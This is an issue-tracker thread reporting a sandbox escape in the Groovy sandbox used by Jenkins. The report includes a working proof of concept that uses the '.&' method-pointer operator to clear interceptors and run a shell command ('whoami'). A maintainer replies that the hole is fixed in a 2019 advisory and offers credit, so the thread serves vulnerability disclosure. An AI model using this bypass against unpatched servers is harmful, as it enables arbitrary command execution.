Sandbox Escape

[XmiliaH]

The left side of .& will not be sandbox transformed, so {'not-sandboxed'}().&x will not transform the closure body. In the body you can than remove all the filters. Here an example:

GroovyShell gs = new GroovyShell(new CompilerConfiguration().addCompilationCustomizers(new SandboxTransformer()));
GroovyValueFilter fa = new GroovyValueFilter() {
    @Override
    public Object filter(Object o) {
        throw new RuntimeException("Denied");
    }
};
fa.register();
try {
    System.out.println(gs.evaluate("{org.kohsuke.groovy.sandbox.GroovyInterceptor.threadInterceptors.get().clear();1}().&x;'whoami'.execute().text"));
}finally {
    fa.unregister();
}

[daniel-beck]

@XmiliaH Thanks for the report! Fixed in https://jenkins.io/security/advisory/2019-07-31/#SECURITY-1465%20(2)

As you may have noticed, this issue tracker is not well monitored. In the future, please report issues as described on https://jenkins.io/security/#reporting-vulnerabilities

Would you like to be credited with this discovery in the security advisory, and if so, how?